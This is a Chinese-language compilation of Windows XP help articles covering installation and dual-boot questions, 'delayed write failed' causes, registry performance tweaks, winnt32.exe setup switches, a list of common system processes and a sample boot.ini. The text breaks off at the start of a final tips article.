问： 为何我安装了Windows XP后，点击关机却总是变成重启？

答: 这是由于有些主板的高级电源管理不能被Windows XP支持。一般用AWARD的BIOS主板的电脑没有这个问题。到目前为止，遇到AMI的BIOS的主板有这个问题。解决的办法是升级你的BIOS，即刷新BIOS。不过可要谨慎，以免刷错了型号。

问： 我先安装了Win XP，它没有提供双引导选项。我还想再装一个Win 98，如何把Win XP的双引导菜单调出来？

答: 你可在Win XP基础上直接安装Win 98，完成之后只能进入Win 98。此时运行Win XP的安装程序，选择“修复安装”即可。再次启动即出现双引导菜单。

问： 如果硬件或BIOS与Windows XP的ACPI规格不符时，在安装时会有什么问题？

答: 如果安装Windows XP时，第一次重新启动计算机后，画面就停留在Windows XP启动画面，无法完成安装程序。建议你与主机板厂商联系，更新你的BIOS。若你无法立即更新BIOS，你可以进入BIOS选单，查看Bios Power Management Setup中Disable \"ACPI function\"。并重新运行Windows XP。安装时按F5，在出现的选项中，选择Standard PC，以便完成Windows XP安装。但完成安装后将无法使用ACPI各项功能。

问： 是否所有的XP都要激活？如果不激活可不可以用？那要怎么样激活？

答: 在Windows XP操作系统中，微软采用了一种“激活”技术。要求使用XP的用户在首次安装系统后的30天内，通过互联网或电话，将系统根据用户硬件配置生成的一组代码和Windows自带的序列号向微软的激活中心注册，否则XP将自动锁定。激活后如果用户多次更换系统硬件或购买新的机器后，也都必须重新激活。这项技术的实质在于保证微软授权的每一个Licence（认证）都只能在一台机器上使用，从而防止盗版商只用一个序列号就能生产出大量盗版XP的现象。

问： 我的电脑是双系统，Win 98在C盘，Win XP在D盘。如果要格式化C盘重装Win 98，在不重装Win XP的情况下，有什么办法恢复双启动？

答: 只管格式化C盘重新安装Win 98好了，安装完成你会发现失去双引导菜单，而失去双引导则意味着无法启动XP。不要紧，重新运行XP的安装程序，选择“修复”安装即可。放心，“修复”安装并非意味着重新安装。

问： 在局域网里如何让Windows 2000访问Windows XP？

答: 先在Windows XP控制面板->用户帐号中添加新的用户，设置好权限之后就可以在Windows 2000里以新添加的用户名与密码来访问Windows XP了。如果你使用的XP是Professional版本，也可以开放guest权限，这样就不需要再新添加用户，任何机器都可以访问XP了。

问： 我有一个Dell的USB 9985键盘，结果在Win 98的纯DOS模式下不能够使用，而在Win 98和Win XP里面使用正常。怎么办？

答: USB设备一般都需要驱动的，9985键盘是USB键盘，所以要先驱动USB端口，在CMOS里面可以进行此项工作，一般CMOS中的Chipset Features里面都有USB KB/Mouse Legacy选项，选择Keyborad就可以了。

问： 我的Windows XP下的Internet Explorer运行很慢，为什么？

答: 如果你机器的CPU和内存够用的话，一般没这个问题。Win XP在256M内存以下运行和256M内存以上运行的效果简直是天壤之别哟。不过嘛，我发现如果对IE的高级选项里的东西做了改动，如添加一些效果，也会使IE变慢，尤其是显示上面的菜单和工具栏的时候。解决办法就是“高级选项”的面板上，点击“默认”，使用IE默认的设置即可。

问： 为何我的Modem不能在XP下工作？

答: 这个主要是因为驱动程序的问题。很多Modem的Win 2000驱动程序也不能在XP下用了，不过倒是有些Modem的Win 98的驱动程序可以在XP下用。另外，金网霸ESS芯片的内置Modem以及一些Rockwell芯片的内置Modem都可以在XP下很好的工作，用XP自带的驱动即可。而且对于金网霸内置Modem的用户，在XP下没有了像Win 2000下那样电话打进来就死机的问题了。

问： 我的Windows XP安装了简体中文语言包后还是英文的，怎么设置啊？

答: 在一些BBS上，我发现很多朋友不大会安装这个语言包。其实安装好了后，欢迎屏幕已经由WELCOME变成欢迎了。至于界面，到“控制面板”－“地区区域选项”－“菜单显示”，选择简体中文，注销后重新登录即可。如果你不选择所有用户都使用这个配置的话，你会发现，其它用户里面还是英文界面的。哈哈，这次可以中英文版同时用了。

问： 为何我在DOS下安装Windows XP很慢？

答: 很多朋友在DOS下安装Windows XP或者Windows 2000的时候，如果没有在安装前运行smartdrv.exe，安装过程就会非常缓慢，可能一个晚上你也安装不完。smartdrv.exe文件在Windows 98/Me的光盘或是Windows系统目录的command目录里。

问： 为何在Windows XP的安装过程中系统提示我必须转化分区为NTFS格式？

答: 这是因为你在Windows下安装的时候安装的不仔细，刚开始安装的时候有个“高级”－在安装过程中允许我选择安装到的分区。重新运行安装程序，记得选择这个，然后重新启动后就可以选择安装到的分区和是否保留原分区格式，或是格式化为NTFS OR FAT32等等。

问： 我现在是用的是Win Me，可以直接升级到XP吗？

答: Windows XP在升级安装上做得十分出色，它的安装方式有三种：升级安装、双系统共存安装和全新安装。我们可在以前的Windows 98/Me/NT4/2000这些操作系统的基础上顺利升级到Windows XP。注意，Win 95、Win NT 3.51以及再早一些的Windows系统是不能升级到Windows XP的。

问： 我最近碰到一个问题，当我安装好Win 98后，再安装Win 2000或XP的时候，总是在拷贝完文件后跳回或是死机，为什么？

答: Win 98是基于DOS的操作系统，尤其是因为要管理好内存，Win 98会在CONFIG.SYS里加载HIMEM.SYS和EMM386.EXE，即使无CONFIG.SYS，Win 98也会在图形界面初始化的时候加载HIMEM.SYS。而这两个管理基本内存的文件，带有多种参数，不同的配置会带来不同的内存分配环境。当然，系统过热比如风扇停转的时候，也会表现出这些症状，您应该首先检查硬件的基本情况如风扇和连线的正常与否。如果你的系统是超频的又不能正常安装话，请降低回正常的频率后再安装Win 2000和XP，成功率较高些。


WinXP“写入缓存失败”的八个常见原因

《一键清理系统垃圾》

WinXP“写入缓存失败”的八个常见原因

    Windows使用了一个特殊的子系统，用于对一些基于磁盘的操作提供支持，例如有一种技术，能够把对磁盘的写入操作暂时缓存起来，然后等到系统空闲的时候再执行相应操作。这种叫做“写入缓存”的技术做能够提升系统地性能，不过默认情况下系统可能并没有开启该功能。

    想知道“写入缓存”选项是如何设置的吗？请打开“设备管理器”，展开“磁盘驱动器”，接着在下面任何一个驱动器图标上点击鼠标右键并选择“属性”，然后切换到“策略”标签。在这里你应该会看到两个选项：“为快速删除而优化”(所有的东西都直接写入硬盘驱动器)和“为提高性能而优化”(写入到缓存)。第一个选项可以允许你快速的断开设备与电脑的连接，例如一个USB闪存，你不用点击任务栏里面的“安全删除硬件”图标就可以直接把这些设备和电脑断开。如果两个选项都处于灰色无法选择的状态，那么说明你的磁盘驱动器默认已经把“写入缓存”选项打开了。(欲查看更多关于延缓写入默认状态的信息，请查看微软的文章“Windows XP and Surprise Removal of Hardware” )

    在Windows XP系统中有时候会弹出“写入缓存失败(Delayed write failed)”的提示，告诉你延缓写入系统可能存在一些问题。虽然这并不是什么致命错误，不过也值得引起你足够的关注。

    下面是一些常见的引起“写入缓存失败”的原因：

    1.磁盘驱动器本身的原因。这种情况尤其发生SCSI或者RAID驱动器上。有一些RAID驱动器的驱动程序会在安装了SP2的XP操作系统中报告一个虚假消息告诉用户“写入缓存失败”。所以你应该为你的磁盘驱动器安装最新版本的驱动程序。

    2.数据线的原因。一些错误或者损坏的数据线，特别是外部USB线和火线，会造成这种情况。如果你的数据线过长，或者数据线连接到的是一个质量不合格的USB HUB上，也会造成写入缓存失败。最后，还有可能是因为你有一个需要80针数据线的UDMA驱动器，但你却使用了一条40针脚的数据线。

    3.SCSI终止错误。虽然这种情况在使用了self-terminating技术的SCSI设备上很少发生，但是我们还是必须把它考虑进来。

  4.媒体错误。这是可能发生的最严重的情况，换句话说，也就是磁盘驱动器坏了。如果你能通过SMART(比如SMART & Simple )软件获取磁盘驱动器的统计信息，那么你可以通过这些信息来判断磁盘驱动器出现了机械(物理)故障。你还可以使用一个叫Gibson Research's SpinRite的工具来帮助你诊断媒体错误，只是这个软件在对磁盘驱动器进行完全检测的时候会耗费相当长的时间。

    5.计算机的BIOS设定强制开启了驱动器控制器不支持的UDMA模式。虽然UDMA 模式能够增强磁盘的性能，但是如果驱动器控制器不支持的话将会导致一些错误发生。这种情况并不多见，主要是发生在新安装的硬件设备上(该硬件设备支持UDMA模式)，用户可以通过升级BIOS或者将BIOS中关于硬盘驱动器的选项恢复成默认的“自动检测”模式来解决这个问题。举个例子：如果设置成UDMA Mode6模式的设备出现了问题，那么你可以将它设置成Mode5模式。

    6.驱动器控制器的问题。我曾经遇到USB控制器和其他硬件设备冲突并产生写入缓存失败的情况。如果你的系统同时拥有长和短两种PCI插槽(64位和32位)，请尝试将USB控制器从长PCI插槽中拔出。一些比较老的PCI 卡并不支持这种类型的插槽。

    7.内存的奇偶校验错误。这种情况通常发生在你新增了一条内存之后，造成这种错误的原因是很可能是你的新内存条和主板所支持的内存类型不符，或者是内存本身有问题。(内存有问题还会造成其他一些错误，例如随机死锁等)

    8.注册表中的LargeSystemCache键值错误。这种情况很少见，通常发生在那些安装了ATI显示适配器，内存大于521MB的机器上。这些机器上的注册表中有一个叫做LargeSystemCache的键

    (HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management)，该键值用来管理系统分配给一些核心进程的内存容量，如果键值被设为1的话(这样设置可以增强内存大于512MB的机器的性能)，有可能会在一些系统中导致数据错误和产生写入缓存失败的错误。如果出现这种情况的话，请把该键值改为0。


WinXPpro优化设置对用XP的网管有帮助

《一键清理系统垃圾》

WinXPpro优化设置对用XP的网管有帮助

动手前的准备

动手之前，首先要确保以管理员的身份登录操作系统，因为普通用户身份下好些选项是无权使用的。接下来请激活清晰字体（ClearType），ClearType能使桌面的文字看起来更加清晰易读——这对于手提电脑或液晶显示器用户尤其重要

    要激活ClearType，请打开控制面板的显示属性，点击“Appearances（外观）”选项卡，然后点击“Effects...（...效果）”按钮，就会弹出如下对话框（由于笔者用的是英文版，涉及到Windows界面的东东，下面均采用前面这样写出英文并括号中注明中文意思的方式）：

    勾上“Use the following method to smooth edges of screen fonts...（用下列方法圆滑屏幕字体边缘）”并在下拉菜单中选择“ClearType（清晰字体）”，然后点击OK（确定），Apply（应用）按钮。

    效果好多了吧？下面我们看看其它的优化！

    好！先来看看一些基本的优化。其中有些是Windows 95/98/ME等以前版本上都有的优化设置，在XP中同样有效，所有这些优化设置都是在在Windows XP Professional版中测试的——它们多半在XP 家庭版中同样有效，有些优化在家庭版中改了个名而已。

优化一——MsConfig

    大多数朋友都应该熟识MsConfig了，这是一个系统内置的Windows设置工具。点击开始菜单，选择“运行”，然后在录入框中敲入“msconfig”回车。我们要动手脚的是“Startup（启动）”选项卡，点击它，就可以看到这个界面：

    这个选项卡中显示了Windows启动时运行的所有程序。这里没有一个程序对Windows来说是生死悠关的，所以放心大胆地把不要的去掉。图中可以看到，笔者把NDetect（ICQ的启动程序）和WinAmpa（就是MP3播放器Winamp了）。把部分勾勾去掉之后，Windows启动会快些，同时空闲的系统资源也会多出一些。

优化二——其它启动优化

    做完前面的优化，让我们进一步深入其它启动项。再次点击开始——>运行，在录入框中敲入“services.msc”，回车后弹出如下窗口：

    这是Windows启动过程的更详细列表，凡是在名字右边标着“Automatic（自动）”的项目都是Windows启动时运行的软件。鼠标单击选中其中一条，就会显示出一些文字，说明它有什么作用。中果决定不需要某种服务，只要右键点击它，把属性中的“Automatic（自动）”改为“Manual（手动）”就得了。

优化三——IE网络浏览器加速技巧

    Windows XP自带Internet Explorer 6，有个小技巧，修改之后启动得飞快（在我的机子上，简直是瞬间启动）。有些朋友试过为“半条命”游戏建个快捷方式，用一定方法修改之后启动加快，这里也是同样原理。右键点击Internet Explorer快捷图标（如任务栏上的快捷启动栏中那个IE图标），打开图标属性之后在“Target（目标）”后面加上“-nohome”参数，如下图：

优化四——菜单延迟

    另一个简单的优化小把戏，就是把滑出菜单时的延迟去掉。修改这个，要用到注册表编辑器（点击开始——>运行，然后敲入“regedit”回车）。要修改的键值在 HKEY_CURRENT_USER\Control Panel\Desktop。具体要修改的键名是MenuShowDelay——只需把值改为0就得了。记住，要重新启动计算机后更改才生效。

优化五——GPEDIT和Autoplay

    Windows XP自带了一个非常好用的优化文件，它就是gpedit.msc。开始——>运行，敲入“gpedit.msc”并回车。这是一个非常有效的编辑工具，可以非常方便地修改一些常见的设置。譬如，你不喜欢CD自动播放的话，用这个工具修改再简便不过了，运行gpedit.msc之后，依次点击Computer Configuration（计算机设置）——>Administrative Templates （管理模板）——>System（系统），这里可以看到一个“Turn off Autoplay（关闭自动运行）”值，右键点击它选择“属性”：

这里还有很多其它的设置，自己慢慢玩，看有什么值得优化的吧。

优化六——寻找“添加/删除”菜单中隐藏了的选项

    不喜欢MSN Messenger吗，或是想把Windows Media Player媒体播放器给删掉？可惜打开控制面板中的“添加/删除程序”，Windows XP自带的程序都不在里面。其实很容易找到，只需用记事本打开Windows\inf\sysoc.inf文件，找到类似下面这一段：

Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7

    这是当前所有已安装部件列表，继续前面MSN Messenger的例子，这个程序条目名是“msmsgs”，在倒数第三行。可以看到被我标为红色的“hide”字样，就是这个参数在控制Windows“添加/删除程序”中不显示这一项。只需把“hide”删掉就得了，如下：

    msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

    改为：

    msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7

    现在重新启动计算机，就可以在“添加/删除程序”列表里看到MSN Messenger了。如果想要在添加/删除程序里看到所有的已安装组件，只需用记事本打开sysoc.inf文件，用记事本的查找/替换功能把所有“,hide”替换为“,”就行了。

优化七——关闭Windows的文件保护

    警告：这样修改之后可以直接删除Windows的关键文件。

    默认状态下系统禁止用户删除系统和程序文件，经过修改注册表可以彻底解除这个限制。打开注册表找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon 中的SFCDisable，把它的值改为0xFFFFFF9D，如下图：

如果要用文件保护，重新把它值改为0就行了。

优化八——关闭计算机时自动结束任务

    在关机的时候，有时会弹出讨厌的对话框，提醒某个程序仍在运行，是否结束任务。其实完全可以通过一点点修改让Windows自动结束这些仍在运行的程序。在注册表中打开HKEY_CURRENT_USER\Control Panel\Desktop 目录，把里面的AugoEndTasks键值改为1：

    注：可能会找不到AutoEndTasks键值，如果是这样的话，自己建一个串值并把它改为这个名字，值设为1就可以了。

优化九——内存性能优化

    Windows XP中有几个选项可以优化内存性能，它们全都在注册表下面位置：

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
Session Manager\Memory Management

    禁用内存页面调度（Paging Executive）

    在正常情况下，XP会把内存中的片断写入硬盘，我们可以阻止它这样做，让数据保留在内存中，从而提升系统性能。要注意的是，拥有很多内存的用户（256M以上）才好使用这个设置。这个设置的名字正如它的功能一样，叫“DisablePagingExecutive”。把它的值从0改为1就可以禁止内存页面调度了。

    提升系统缓存

    把LargeSystemCache键值从0改为1，Windows XP就会把除了4M之外的系统内存全部分配到文件系统缓存中，这意味着XP的内核能够在内存中运行，大大提高系统速度。剩下的4M内存是用来做磁盘缓存的，在一定条件下需要的时候，XP还会分配更多一些。一般来说，这项优化会使系统性能得到相当的提升，但也有可能会使某些应用程序性能降低。正如前面所说的，必须有256M以上的内存，才好激活LargeSystemCache，否则不要动它。

输入/输出性能

    这个优化只对server用户才有实在意义——它能够提升系统进行大容量文件传输时的性能。在默认情况下，这个键值在注册表中是不存在的，必须自己建一个DWORD（双字节值）键值，命名为IOPageLockLimit。多数人在使用这项优化时都发现8到16M字节之间性能最好，具体设什么值，可以设进去试试看哪个值可以获得最佳性能。记住这个值是用字节来计算的，因此，譬如你要分配12M的话，就是12 * 1024 * 1024，也就是12582912。跟前面的内存优化一样，只有当你的内存大于256M的时候才好更改这里的值。

优化十——加速共享查看

    这是一项很棒的优化，在找到这项优化之前，我经常在漫长地等待窗口显示其它机子上的共享目录中敲破头皮。通常情况下，当Windows XP连接到其它计算机时，会检查对方机子上所有预定的任务——这真是多余，而且还会让你等上30秒钟，实在太糟糕了。所幸的是，很容易就可以把这个过程给禁掉。首先，在注册表中找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows/Current
Version\Explorer\RemoteComputer\NameSpace。在这里面，应该有个
{D6277990-4C6A-11CF-8D87-00AA0060F5BF}键。只需把它删掉，重新启动计算机后，Windows就不再检查预定任务了，速度明显提高！

优化十一——手动指定进程次序

    同时按下Control+Alt+Delete三个键，然后点击“Processes（进程）”选项卡，可以看到一个如上图所示的对话框，在这里可以看到目前正在运行的所有进程。如果要为一个程序分配更多的进程时间，如3D Studio Max，只需右键点击这个进程，再把鼠标指针向下移动到“Set Priority>（设置优先级）”，然后选择你想要这个程序处在哪个优先级。当我接收email时，我会把3DMAX设为“标准”，但当我离开计算机的时候，我会把它的优先急提升为最高的“实时”，这样可以计算机更专注更快速地处理3D动作。

优化十二——为IRQ中断请求排优先次序

    这是本优化指南的最后一项优化，也是一项非常有效的优化。计算机的每一个主要部件都设了个IRQ中断号。这里就是要通过修改每个IRQ请求的优先次序达到优化目的。这里主要的优化对象是系统/CMOS实时钟，它通过主板来提升性能。首先，要确定你想要哪个组件获得更高的性能，然后找到这个硬件正在使用的IRQ中断号。怎么找呢？打开控制面板里的系统属性（也可以按键盘上的Windows+Break热键组合打开它）。选中“硬件”选项卡，然后点击“设备管理器”按钮。

   右键点击要查IRQ号的组件，选择“属性”，然后点击“资源”选项卡。

这里可以看到设备正在使用的IRQ中断号（如果没有IRQ中断号，选择另一个设备）。把中断号记下来，然后运行注册表编辑器regedit，找到注册表中的HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\
PriorityControl 位置。我们要在这里建立一个名为IRQ#Priority（其中“#”是具体的IRQ中断号）的DWORD双字节值，然后把它的值设为1。譬如说，我的系统CMOS实时钟的IRQ中断号是8，我要建立的键名就是IRQ8Priority。

    重新启动计算机之后，就会发现刚优化过的组件性能有所提高。笔者强烈建议用这个方法优化系统CMOS实时钟，因为它能改善整块主板的性能。当然也可以把多个IRQ中断号优先级提高，但这样做的效果没那么好，而且有可能造成系统不稳定。要把这个优化设置撤消的话，只要把刚才建立的注册表键值删掉就OK了。

结语

    Windows XP优化指南就写这么多，希望无论在外观还是性能上都能为你带来一些好处。（至于外观方面写得较少，因为笔者将会着手写一篇Windows XP整形手术）祝各位玩得开心！


WinXP安装参数

《一键清理系统垃圾》

WinXP安装参数

    2002-01-28　　　作者：

昨天，WinXP简体中文版在北京正式发行了。这意味着被微软称之为最重要的产品的简体中文版正式在中国上市了，那么新版本的操作系统在安装上有什么不同呢？我们先来看看winnt32.exe有哪些参数可以使用。
    winnt32.exe位于i386目录里面。这个文件可以直接运行于windows下面，其具体参数有：

安装或升级到 Windows XP。在运行 Windows 95、Windows 98、Windows Me、Windows NT、Windows 2000 或 Windows XP 的计算机上，可以从命令提示符中运行 winnt32。

语法
winnt32 [/checkupgradeonly] [/cmd:command_line] [/cmdcons] [/copydir:i386\folder_name] [/copysource:
folder_name] [/debug[level]:[filename]] [/dudisable] [/duprepare:pathname] [/dushare:pathname] [/m:folder_name] [/
makelocalsource] [/noreboot] [/s:sourcepath] [/syspart:drive_letter] [/tempdrive:drive_letter] [/udf:id [,
UDB_file]] [/unattend[num]:[answer_file]]

参数

/checkupgradeonly

检查计算机与 Windows XP 的升级兼容性。
如果在使用该选项时使用了 /unattend，则不需要用户输入。否则，结果将显示在屏幕上，并且可以用您指定的文件名保存它们。默认的文件名为 Upgrade.txt（位于 systemroot 文件夹）。

/cmd:command_line

指示安装程序在执行最后阶段的安装前，运行一个特殊的命令。这将在计算机重新启动两次并且“安装程序”收集了必要的配置信息后，以及“安装程序”结束之前发生。

/cmdcons

在运行的计算机上将“故障恢复控制台”作为启动选项安装。恢复控制台是一个命令行界面，可以用它执行诸如启动和停止服务以及访问本地驱动器（包括 NTFS 格式的驱动器）这样的任务。只有在常规安装完毕后，才可以使用 /cmdcons 选项。

/copydir:i386\folder_name

在安装 Windows XP 文件的文件夹内另外创建一个文件夹。
文件夹名是指您为保存对站点所进行的修改而创建的文件夹。例如，您可以在安装程序的 i386 源文件夹中创建名为 Private_drivers 的文件夹，用来存放驱动程序文件。然后，您可以键入 /copydir:i386\Private_drivers 让安装程序将该文件夹复制到新安装的计算机上，并建立新的文件夹位置 systemroot\Private_drivers。还可以使用 /copydir 命令创建任意多个其他的文件夹。

/copysource:folder_name

在安装 Windows XP 文件的文件夹内另外创建一个临时文件夹。
文件夹名是指您为保存对站点所进行的修改而创建的文件夹。例如，您可以在安装程序的源文件夹中创建名为 Private_drivers 的文件夹，用来存放驱动程序文件。然后，您可以键入 /copysource:Private_drivers 以使安装程序将该文件夹复制到最新安装的计算机上，并在安装期间使用它的文件，从而建立临时文件夹位置 systemroot\Private_drivers。还可以使用 /copysource 命令创建任意多个其他的文件夹。与 /copydir 创建的文件夹不同，/copysource 创建的文件夹在安装完成后即被删除。

/debug[level]:[filename]

在指定等级处创建调试日志，例如，/debug4:Debug.log。默认日志文件为 C:\systemroot\Winnt32.log，并且默认调试等级为 2。日志等级如下所示：0 -- 严重错误、1 -- 错误、2 -- 警告、3 -- 通知、4 -- 用于调试的详细信息。每个级别都在其下包括一些子级别。

/dudisable

禁用“动态更新”。没有“动态更新”，安装程序仅能在初始安装文件下运行。即使使用应答文件并在该文件中指定“动态更新”选项，该选项仍会禁用“动态更新”。

/dushare:pathname

将以前从 Windows Update 网站下载的“动态更新”文件（更新的文件在安装时使用）的目录指定为共享。当从安装共享处运行并使用 /duprepare 时，该选项将执行准备操作，这样，经过更新的文件才能在基于网络的客户端安装中使用。如果没有使用 /duprepare 并且在客户端上运行，则指定客户端安装将使用位于 pathname 所指定的共享位置的更新文件。

/duprepare

进行安装共享准备，使从 Windows Update 网站下载的“动态更新”文件可以使用它。然后，该共享可用于多个客户端的 Windows XP 安装。只能与 /dushare 一起使用。

/m:folder_name

指定“安装程序”从备用位置复制替换文件。指导“安装程序”首先在备用位置中查看，如果有文件显示，则应使用这些文件而非默认位置中的文件。

/makelocalsource

指示安装程序将所有的安装源文件复制到本地硬盘上。当采用从光盘安装时，使用 /makelocalsource 可以在以后没有光盘的情况下，为计算机提供安装文件。

/noreboot

指导“安装程序”在结束文件复制阶段之后不重新启动计算机，这样您就可以执行另一个命令。

/s:sourcepath

指定 Windows XP 文件的源位置。要同时从多个服务器复制文件，请多次键入 /s:sourcepath 选项（最多八次）。如果输入多次选项，则所指定的第一个服务器必须是可用的，否则“安装程序”失败。

/syspart:drive_letter

表明可以将安装启动文件复制到一个硬盘上，并将硬盘标记为活动，然后将该磁盘安装到其他计算机上。启动该计算机时，它将自动启动下一阶段的安装。但必须始终同时使用 /tempdrive 参数和 /syspart 参数。
在运行 Windows NT 4.0、Windows 2000 或 Windows XP 的计算机上，可以使用 /syspart 选项来启动 Winnt32。运行 Windows 95、Windows 98 或 Windows Me 的计算机不能使用该选项。

/tempdrive:drive_letter

指导安装程序将临时文件放置到指定部分。对于全新安装， 可以将 Windows XP 安装在指定的分区。对于升级安装，
/tempdrive 选项仅影响临时文件的位置，而操作系统的升级则在运行 winnt32 的分区中进行。

/udf:id [,UDB_file]

指出安装程序用来指定“唯一数据库”(UDB) 文件如何修改应答文件的标识符 (id)（请参阅 /unattend 项）。
UDF 会覆盖应答文件中的一些值，且标识符会决定使用 UDF 中的哪些值。例如，/udf:RAS_user,Our_company.udb 会覆盖Our_company.udb 文件中为 RAS_user 标识符指定的一些设置。如果没有指定 UDF_file，安装程序会提示用户插入一张含有Unique.udb 文件的磁盘。

/unattend

以无人参与的安装模式升级 Windows 98 或 Windows Me 以前的版本。因为所有用户设置都可以从上一次安装中获得，所以在安装过程中并不需要用户干预。

/unattend[num]:[answer_file]

在无人参与安装模式下执行干净安装。所指定的应答文件为安装程序提供了您自定义的设置信息。
Num 是在安装程序结束复制这些文件与重新启动计算机之间间隔的秒数。在运行 Windows 98、Windows Me、Windows NT、Windows 2000 或 Windows XP 的任何计算机上都可以使用 num 选项。
如果使用 /unattend 命令行选项来自动完成安装程序，则表示您已经阅读和接受了 Windows XP 的 Microsoft 许可协议。在代表某个组织而不是您自己使用该命令行选项来安装 Windows XP 之前，您必须确认最终用户（无论是个人还是单个实体）已经接收、阅读并接受 Windows XP 的 Microsoft 许可协议的条款。OEM 在销售给最终用户的机器上可能不会指定此值。


Windows XP 常见的进程列表

《一键清理系统垃圾》

Windows XP 常见的进程列表

最基本的系统进程（也就是说，这些进程是系统运行的基本条件，有了这些进程，系统
就能正常运行）

smss.exe Session Manager
csrss.exe 子系统服务器进程
winlogon.exe 管理用户登录
services.exe 包含很多系统服务
lsass.exe 管理 IP 安全策略以及启动 ISAKMP/Oakley (IKE) 和 IP 安全驱动程序。
(系统服务)
产生会话密钥以及授予用于交互式客户/服务器验证的服务凭据(ticket)。(系统服务)
svchost.exe 包含很多系统服务
svchost.exe
SPOOLSV.EXE 将文件加载到内存中以便迟后打印。(系统服务)
explorer.exe 资源管理器
internat.exe 托盘区的拼音图标

附加的系统进程（这些进程不是必要的，你可以根据需要通过服务管理器来增加或减
少）
mstask.exe 允许程序在指定时间运行。(系统服务)
regsvc.exe 允许远程注册表操作。(系统服务)
winmgmt.exe 提供系统管理信息(系统服务)。
inetinfo.exe 通过 Internet 信息服务的管理单元提供 FTP 连接和管理。(系统服务)
tlntsvr.exe 允许远程用户登录到系统并且使用命令行运行控制台程序。(系统服务)
允许通过 Internet 信息服务的管理单元管理 Web 和 FTP 服务。(系统服务)
tftpd.exe 实现 TFTP Internet 标准。该标准不要求用户名和密码。远程安装服务
的一部分。(系统服务)
termsrv.exe 提供多会话环境允许客户端设备访问虚拟的 Windows 2000
Professional 桌面会话以及运行在服务器上的基于 Windows 的程序。(系统服务)
dns.exe 应答对域名系统(DNS)名称的查询和更新请求。(系统服务)

以下服务很少会用到，上面的服务都对安全有害，如果不是必要的应该关掉
tcpsvcs.exe 提供在 PXE 可远程启动客户计算机上远程安装 Windows 2000
Professional 的能力。(系统服务)
支持以下 TCP/IP 服务：Character Generator, Daytime, Discard, Echo, 以及
Quote of the Day。(系统服务)
ismserv.exe 允许在 Windows Advanced Server 站点间发送和接收消息。(系统服
务)
ups.exe 管理连接到计算机的不间断电源(UPS)。(系统服务)
wins.exe 为注册和解析 NetBIOS 型名称的 TCP/IP 客户提供 NetBIOS 名称服务。
(系统服务)
llssrv.exe License Logging Service(system service)
ntfrs.exe 在多个服务器间维护文件目录内容的文件同步。(系统服务)
RsSub.exe 控制用来远程储存数据的媒体。(系统服务)
locator.exe 管理 RPC 名称服务数据库。(系统服务)
lserver.exe 注册客户端许可证。(系统服务)
dfssvc.exe 管理分布于局域网或广域网的逻辑卷。(系统服务)
clipsrv.exe 支持“剪贴簿查看器”，以便可以从远程剪贴簿查阅剪贴页面。(系统
服务)
msdtc.exe 并列事务，是分布于两个以上的数据库，消息队列，文件系统，或其
它事务保护资源管理器。(系统服务)
faxsvc.exe 帮助您发送和接收传真。(系统服务)
cisvc.exe Indexing Service(system service)
dmadmin.exe 磁盘管理请求的系统管理服务。(系统服务)
mnmsrvc.exe 允许有权限的用户使用 NetMeeting 远程访问 Windows 桌面。(系统服
务)
netdde.exe 提供动态数据交换 (DDE) 的网络传输和安全特性。(系统服务)
smlogsvc.exe 配置性能日志和警报。(系统服务)
rsvp.exe 为依赖质量服务(QoS)的程序和控制应用程序提供网络信号和本地通信控制
安装功能。(系统服务)
RsEng.exe 协调用来储存不常用数据的服务和管理工具。(系统服务)
RsFsa.exe 管理远程储存的文件的操作。(系统服务)
grovel.exe 扫描零备份存储(SIS)卷上的重复文件，并且将重复文件指向一个数据存
储点，以节省磁盘空间。(系统服务)
SCardSvr.exe 对插入在计算机智能卡阅读器中的智能卡进行管理和访问控制。(系统
服务)
snmp.exe 包含代理程序可以监视网络设备的活动并且向网络控制台工作站汇报。(系
统服务)
snmptrap.exe 接收由本地或远程 SNMP 代理程序产生的陷阱消息，然后将消息传递
到运行在这台计算机上 SNMP 管理程序。(系统服务)
UtilMan.exe 从一个窗口中启动和配置辅助工具。(系统服务)
msiexec.exe 依据 .MSI 文件中包含的命令来安装、修复以及删除软件。(系统服务)


xp的boot.ini文件内容

《一键清理系统垃圾》

xp的boot.ini文件内容

[boot loader]
timeout=3
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Profession"


windowsXP你不可不知道的秘密哦！~

《一键清理系统垃圾》

windowsXP你不可不知道的秘密哦！~

自从微软发布Windows XP以来，Windows XP已经得到人们越来越广泛的应用，微软也宣称它是迄今为止最好的操作系统。Windows XP到底有什么出色的地方？让我秒杀先来告诉你其中的一些小秘密吧！
●关闭自动播放功能
   一旦您将媒体插入驱动器，自动运行就会从驱动器中读取数据，这会造成程序的设置文件和在音频媒体上的音乐立即开始。你可以用下面这个办法关闭这个功能：点“开始”→“运行”，在对话框中输入“gpedit.msc” →“计算机配置”→“管理模板”→“系统”，双击“关闭自动播放”，在“设置”中选“已启用”，确定即可。
●使ZIP文档读取能力失效
